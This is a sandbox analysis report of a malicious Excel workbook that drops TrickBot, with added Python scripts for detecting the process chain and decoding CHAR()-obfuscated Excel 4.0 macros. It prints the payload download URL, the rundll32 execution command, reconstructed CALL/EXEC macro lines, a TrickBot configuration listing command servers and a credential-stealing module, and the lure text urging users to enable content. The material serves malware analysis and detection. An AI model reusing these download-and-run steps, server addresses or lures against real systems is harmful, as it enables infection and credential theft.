
Analysis Report 446446.xls

Overview

General Information

Sample Name:446446.xls
Analysis ID:385552
MD5:1b62b4f4b16d6219dce4c6d145c5af79
SHA1:d5bc46f3043119c020ae93121195aabbf151cf75
SHA256:dd3ecdcc3a6cc81ee451f90703cc899ff43c7a05b30a6538e5f3afd73f77adb1

Detection

Hidden Macro 4.0 TrickBot
Score: 96 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Trickbot
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Office process drops PE file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2056 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2564 cmdline: rundll32 ..\fdinmd.fii,StartW MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2588 cmdline: rundll32 ..\fdinmd.fii,StartW MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • wermgr.exe (PID: 2604 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
  • cleanup
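The process tree above (Excel spawning rundll32 with a module that is not a .dll, reached through a relative path, which then spawns wermgr.exe) is the kind of chain a detection engineer would want a rule for, and the Sigma section further down reports no match. The following is an added example, not part of the Joe Sandbox report: a small Python check over process-creation events. The events are constructed to mirror the Startup tree (the PPID 1234 for the explorer.exe that launched Excel is assumed; the report does not give it), and a benign rundll32 launch of a real DLL is included as a control.

```python
import re

# Process-creation events constructed to mirror the Startup tree in the report
# (Sysmon-style fields). PPID 1234 for Excel's own parent is assumed; the last
# event is a benign control: rundll32 loading a genuine system DLL.
EVENTS = [
    {"pid": 2056, "ppid": 1234, "image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "cmdline": r"'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding"},
    {"pid": 2564, "ppid": 2056, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32 ..\fdinmd.fii,StartW"},
    {"pid": 2588, "ppid": 2564, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"rundll32 ..\fdinmd.fii,StartW"},
    {"pid": 2604, "ppid": 2588, "image": r"C:\Windows\System32\wermgr.exe",
     "cmdline": r"C:\Windows\system32\wermgr.exe"},
    {"pid": 3001, "ppid": 1234, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "msaccess.exe", "outlook.exe"}
# "rundll32[.exe] <rest>", with or without a directory prefix or quotes around the binary.
RUNDLL32_CMD = re.compile(r'^\s*"?(?:.*\\)?rundll32(?:\.exe)?"?\s+(.+?)\s*$', re.IGNORECASE)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rundll32_module(cmdline):
    """Split a rundll32 command line into (module_path, export_name); None if it is not one."""
    m = RUNDLL32_CMD.match(cmdline)
    if not m:
        return None
    rest = m.group(1)
    if rest.startswith('"'):                    # quoted module path: "C:\Program Files\x.dll",Run
        end = rest.find('"', 1)
        module, tail = rest[1:end], rest[end + 1:]
    else:                                       # unquoted: module,Export args
        module, _, tail = rest.partition(",")
    tail = tail.lstrip(",").strip()
    export = tail.split()[0] if tail else ""
    return module, export


def evaluate(events):
    """Return [(pid, [reasons])] for every event matching the Office -> rundll32 loader pattern."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_name = basename(parent["image"]) if parent else ""
        reasons = []
        if name == "rundll32.exe":
            if parent_name in OFFICE_APPS:
                reasons.append("office-parent")
            parsed = rundll32_module(e["cmdline"])
            if parsed:
                module, _export = parsed
                if not module.lower().endswith(".dll"):
                    reasons.append("non-dll-module")         # fdinmd.fii: a PE under a bogus extension
                if "..\\" in module or module.lower().startswith("c:\\users\\"):
                    reasons.append("relative-or-user-path")  # resolved relative to the document's folder
        elif name == "wermgr.exe" and parent_name == "rundll32.exe":
            # the report notes the child is created suspended, the usual prelude to injection
            reasons.append("wermgr-spawned-by-rundll32")
        if reasons:
            findings.append((e["pid"], reasons))
    return findings


if __name__ == "__main__":
    for pid, reasons in evaluate(EVENTS):
        print(pid, ", ".join(reasons))
```

The module check is deliberately on the argument, not on the image: rundll32.exe itself is a signed Windows binary and will never look suspicious on its own. Tune the parent list and the path test to your estate (some deployment tools do launch rundll32 with user-profile paths); the non-.dll extension combined with an Office parent is the high-confidence part of the rule.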

Malware Configuration

Threatname: Trickbot

{"ver": "2000028", "gtag": "rob52", "servs": ["89.250.208.42:449", "182.253.184.130:449", "31.211.85.110:443", "85.112.74.178:449", "102.68.17.97:443", "103.76.150.14:443", "96.9.77.142:443", "91.185.236.170:449", "87.76.1.81:449", "91.225.231.120:443", "62.213.14.166:443", "201.114.152.181:60304", "91.248.207.239:13871", "5.50.104.227:23468", "122.117.176.99:50289", "250.16.62.7:12037", "43.219.127.177:42389", "183.210.9.161:55813", "203.2.134.219:34188", "24.203.49.183:64402", "89.227.14.153:60566", "44.55.149.111:41730", "197.181.162.30:5798", "152.49.214.109:59125", "245.241.127.55:36657", "107.85.198.194:37398", "191.250.160.220:23460", "40.81.224.235:45065", "211.246.214.27:8638"], "autorun": ["pwgrab"], "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc="}

Yara Overview

Initial Sample

Source | Rule | Description | Author
446446.xls | SUSP_EnableContent_String_Gen | Detects suspicious string that asks to enable active content in Office Doc | Florian Roth
Strings:
  • 0x165db:$e1: Enable Editing
  • 0x16325:$e3: Enable editing
  • 0x163f7:$e4: Enable content

Memory Dumps

Source | Rule | Description | Author
00000004.00000002.2089168736.0000000000650000.00000004.00000001.sdmp | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security
00000004.00000002.2089228876.00000000007C0000.00000040.00000001.sdmp | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security
00000004.00000002.2089212647.0000000000780000.00000040.00000001.sdmp | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security

Unpacked PEs

Source | Rule | Description | Author
4.2.rundll32.exe.780000.2.unpack | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security
4.2.rundll32.exe.650000.0.raw.unpack | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security
4.2.rundll32.exe.780000.2.raw.unpack | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000004.00000002.2089228876.00000000007C0000.00000040.00000001.sdmp Malware Configuration Extractor: Trickbot (configuration as listed under Malware Configuration above)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: 4HeVw[1].perclick.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe
Source: global traffic DNS query: name: living-traditions.com
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 64.207.186.30:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 64.207.186.30:80
Source: global traffic HTTP traffic detected: GET /blogs/click.php HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: living-traditions.com | Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1281B7DE.emf
Source: global traffic HTTP traffic detected: GET /blogs/click.php HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: living-traditions.com | Connection: Keep-Alive
Source: rundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: living-traditions.com
Source: rundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: 446446.xls, 51DE0000.0.dr String found in binary or memory: http://living-traditions.com/blogs/click.php
Source: rundll32.exe, 00000003.00000002.2090115718.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089561983.0000000002137000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2090115718.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089561983.0000000002137000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2090115718.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089561983.0000000002137000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2090115718.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089561983.0000000002137000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2090115718.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089561983.0000000002137000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 14 0 Protected Vie
Source: Screenshot number: 4 Screenshot OCR: Enable content" to oerform Microsoft Office Decrvotion Core to start V Q R S IE"]' ^ Enable Edit
Source: Document image extraction number: 2 Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. Protected View This fi
Source: Document image extraction number: 2 Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Document image extraction number: 3 Screenshot OCR: Enable Content
Source: Document image extraction number: 4 Screenshot OCR: Enable Editing
Source: Document image extraction number: 13 Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
Source: Document image extraction number: 13 Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Found Excel 4.0 Macro with suspicious formulas
Source: 446446.xls Initial sample: CALL
Source: 446446.xls Initial sample: EXEC
Found obfuscated Excel 4.0 Macro
Source: 446446.xls Initial sample: High usage of CHAR() function: 39
Source: 446446.xls Initial sample: High usage of CHAR() function: 26
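The two signatures above are metrics, not the macro itself: the report says CALL and EXEC are present and that CHAR() is used 39 and 26 times, but it does not reproduce the cell formulas. The following is an added example, not code from the Joe Sandbox report, showing what that obfuscation looks like and how to undo it: Excel 4.0 macros build strings such as the urlmon/URLDownloadToFileA names out of CHAR(n)&CHAR(m)&... runs so that the plaintext never appears in the sheet. The sample formulas are constructed in that style (they are not the actual contents of 446446.xls), and the threshold of 20 CHAR() calls is an assumed cut-off, not the one the sandbox uses.

```python
import re

# Constructed Excel 4.0 (XLM) formulas in the style this sample's signatures fire on.
# They are NOT the real cell contents of 446446.xls, which the report does not reproduce.
SAMPLE_FORMULAS = [
    '=CHAR(117)&CHAR(114)&CHAR(108)&CHAR(109)&CHAR(111)&CHAR(110)',                        # "urlmon"
    '=CHAR(85)&CHAR(82)&CHAR(76)&CHAR(68)&CHAR(111)&CHAR(119)&CHAR(110)&CHAR(108)&CHAR(111)'
    '&CHAR(97)&CHAR(100)&CHAR(84)&CHAR(111)&CHAR(70)&CHAR(105)&CHAR(108)&CHAR(101)&CHAR(65)',  # "URLDownloadToFileA"
    '=CALL(A1,A2,"JJCCBB",0,"http://living-traditions.com/blogs/click.php","..\\fdinmd.fii",0,0)',
    '=EXEC("rundll32 ..\\fdinmd.fii,StartW")',
    '=HALT()',
    '=SUM(B1:B3)',
]

# A run of CHAR(n) calls joined by the & concatenation operator.
CHAR_RUN = re.compile(r'CHAR\(\d+\)(?:\s*&\s*CHAR\(\d+\))*', re.IGNORECASE)
CHAR_CALL = re.compile(r'CHAR\((\d+)\)', re.IGNORECASE)

# Tokens that mean an XLM formula is doing something other than spreadsheet arithmetic.
SUSPICIOUS_TOKENS = ('CALL(', 'EXEC(', 'REGISTER(', 'FORMULA(', 'URLDOWNLOADTOFILE', 'RUNDLL32')


def char_usage(formula):
    """Number of CHAR() calls in one formula (the metric behind 'High usage of CHAR() function')."""
    return len(CHAR_CALL.findall(formula))


def decode_char_concat(formula):
    """Collapse every CHAR(n)&CHAR(m)&... run into the string literal it builds."""
    def run_to_literal(match):
        codes = (int(n) for n in CHAR_CALL.findall(match.group(0)))
        text = ''.join(chr(c) if 0 < c < 256 else '?' for c in codes)  # Excel CHAR() takes 1..255
        return '"' + text + '"'
    return CHAR_RUN.sub(run_to_literal, formula)


def scan_formulas(formulas, char_threshold=20):
    """Decode each formula, flag the ones carrying suspicious tokens, and report CHAR() density."""
    flagged = []
    total_char = 0
    for index, formula in enumerate(formulas):
        total_char += char_usage(formula)
        decoded = decode_char_concat(formula)
        hits = [tok for tok in SUSPICIOUS_TOKENS if tok in decoded.upper()]
        if hits:
            flagged.append({'index': index, 'decoded': decoded, 'hits': hits})
    return {'char_calls': total_char,
            'obfuscated': total_char >= char_threshold,   # assumed cut-off, not the sandbox's
            'flagged': flagged}


if __name__ == '__main__':
    result = scan_formulas(SAMPLE_FORMULAS)
    print('CHAR() calls:', result['char_calls'], '-> obfuscated:', result['obfuscated'])
    for hit in result['flagged']:
        print(f"cell {hit['index']}: {hit['hits']} :: {hit['decoded']}")
```

Feed it the formulas pulled out of the workbook's macro sheet by any XLM-capable parser; the decoded CALL/EXEC lines are usually enough to recover the download URL and the dropped path without running the document. Real samples also spread the pieces across cells and assemble them with FORMULA() or references, which is why the scan looks at decoded text rather than at individual CHAR() calls.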
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\4HeVw[1].perclick
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\fdinmd.fii
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: 446446.xls OLE indicator, VBA macros: true
Source: 446446.xls, type: SAMPLE Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: rundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal96.troj.expl.evad.winXLS@7/7@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC532.tmp
Source: 446446.xls OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fdinmd.fii,StartW
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fdinmd.fii,StartW
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fdinmd.fii,StartW
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fdinmd.fii,StartW
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fdinmd.fii,StartW
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_007C27CB push dword ptr [edx+14h]; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_007C2720 push dword ptr [edx+14h]; ret
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\4HeVw[1].perclick
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\fdinmd.fii
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\fdinmd.fii
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\4HeVw[1].perclick
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\fdinmd.fii

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\fdinmd.fii
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX (26 identical entries)
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\4HeVw[1].perclick
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fdinmd.fii,StartW
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe

Stealing of Sensitive Information:

Yara detected Trickbot
Source: Yara match, file source: 00000004.00000002.2089168736.0000000000650000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000002.2089228876.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000002.2089212647.0000000000780000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 4.2.rundll32.exe.780000.2.unpack, type: UNPACKEDPE
Source: Yara match, file source: 4.2.rundll32.exe.650000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 4.2.rundll32.exe.780000.2.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Trickbot
Source: the same six Yara matches (three memory dumps, three unpacked PEs) listed under Stealing of Sensitive Information

Mitre Att&ck Matrix

Techniques with signature hits, grouped by tactic (the trailing number is the report's signature-count badge as extracted; unflagged matrix cells are omitted):

Execution: Scripting (21), Exploitation for Client Execution (33)
Privilege Escalation: Process Injection (11)
Defense Evasion: Masquerading (121), Disable or Modify Tools (1), Rundll32 (1), Process Injection (11), Scripting (21), Obfuscated Files or Information (1)
Discovery: File and Directory Discovery (1), System Information Discovery (2)
Command and Control: Non-Application Layer Protocol (2), Application Layer Protocol (12), Ingress Tool Transfer (2)


              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

Source | Detection | Scanner | Label
4.2.rundll32.exe.780000.2.unpack | 100% | Avira | HEUR/AGEN.1138157

              Domains

              No Antivirus matches

              URLs

Source | Detection | Scanner | Label
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://living-traditions.com/blogs/click.php | 0% | Avira URL Cloud | safe

              Domains and IPs

              Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
living-traditions.com | 64.207.186.30 | true | false | - | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://living-traditions.com/blogs/click.php | false | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | rundll32.exe, 00000003.00000002.2090115718.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089561983.0000000002137000.00000002.00000001.sdmp | false | - | high
http://www.windows.com/pctv. | rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmp | false | - | high
http://investor.msn.com | rundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmp | false | - | high
http://www.msnbc.com/news/ticker.txt | rundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmp | false | - | high
http://www.icra.org/vocabulary/. | rundll32.exe, 00000003.00000002.2090115718.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089561983.0000000002137000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | rundll32.exe, 00000003.00000002.2090115718.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089561983.0000000002137000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | rundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmp | false | - | high
http://investor.msn.com/ | rundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmp | false | - | high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
64.207.186.30 | living-traditions.com | United States | 398110 | GO-DADDY-COM-LLC (US) | false

                            General Information

                            Joe Sandbox Version:31.0.0 Emerald
                            Analysis ID:385552
                            Start date:12.04.2021
                            Start time:17:05:10
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 5m 20s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:446446.xls
                            Cookbook file name:defaultwindowsofficecookbook.jbs
                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:7
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal96.troj.expl.evad.winXLS@7/7@1/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 32.1% (good quality ratio 25%)
                            • Quality average: 58.1%
                            • Quality standard deviation: 41.3%
                            HCA Information:
                            • Successful, ratio: 83%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .xls
                            • Found Word or Excel or PowerPoint or XPS Viewer
                            • Attach to Office via COM
                            • Scroll down
                            • Close Viewer
                            Warnings:
                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • TCP Packets have been reduced to 100
                            • Report size getting too big, too many NtCreateFile calls found.
                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/385552/sample/446446.xls

                            Simulations

                            Behavior and APIs

                            Time | Type | Description
                            17:05:41 | API Interceptor | 1x Sleep call for process: rundll32.exe modified

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            No context

                            ASN

                            Match: GO-DADDY-COM-LLC (US)

                            Associated Sample Name / URL | Detection | Context (IP)
                            documents-1982636004.xlsm | malicious | 107.180.50.162
                            documents-1982636004.xlsm | malicious | 107.180.50.162
                            documents-466266883.xlsm | malicious | 107.180.50.162
                            documents-466266883.xlsm | malicious | 107.180.50.162
                            Processed APR12.xlsx | malicious | 192.169.223.13
                            NdBLyH2h5d.exe | malicious | 184.168.131.241
                            4oItdZkNOZ.exe | malicious | 107.180.50.167
                            Portfolio.exe | malicious | 72.167.241.46
                            12042021493876783,xlsx.exe | malicious | 184.168.131.241
                            CIVIP-8287377.exe | malicious | 184.168.177.1
                            MT103_004758.exe | malicious | 184.168.131.241
                            Payment advice IN18663Q0031139I.xlsx | malicious | 184.168.131.241
                            Swift002.exe | malicious | 50.62.160.230
                            36ne6xnkop.exe | malicious | 184.168.131.241
                            56UDmImzPe.dll | malicious | 107.180.90.10
                            Shipping doc&_B-Landen.exe | malicious | 50.62.137.41
                            Statement-ID261179932209970.vbs | malicious | 148.72.208.50
                            _.ryder.com._1602499153.666014.dll | malicious | 166.62.30.150
                            mW07jhVxX5.exe | malicious | 184.168.131.241
                            jEXf5uQ3DE.exe | malicious | 184.168.131.241

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\4HeVw[1].perclick
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                            Category:downloaded
                            Size (bytes):449536
                            Entropy (8bit):5.5101637778448955
                            Encrypted:false
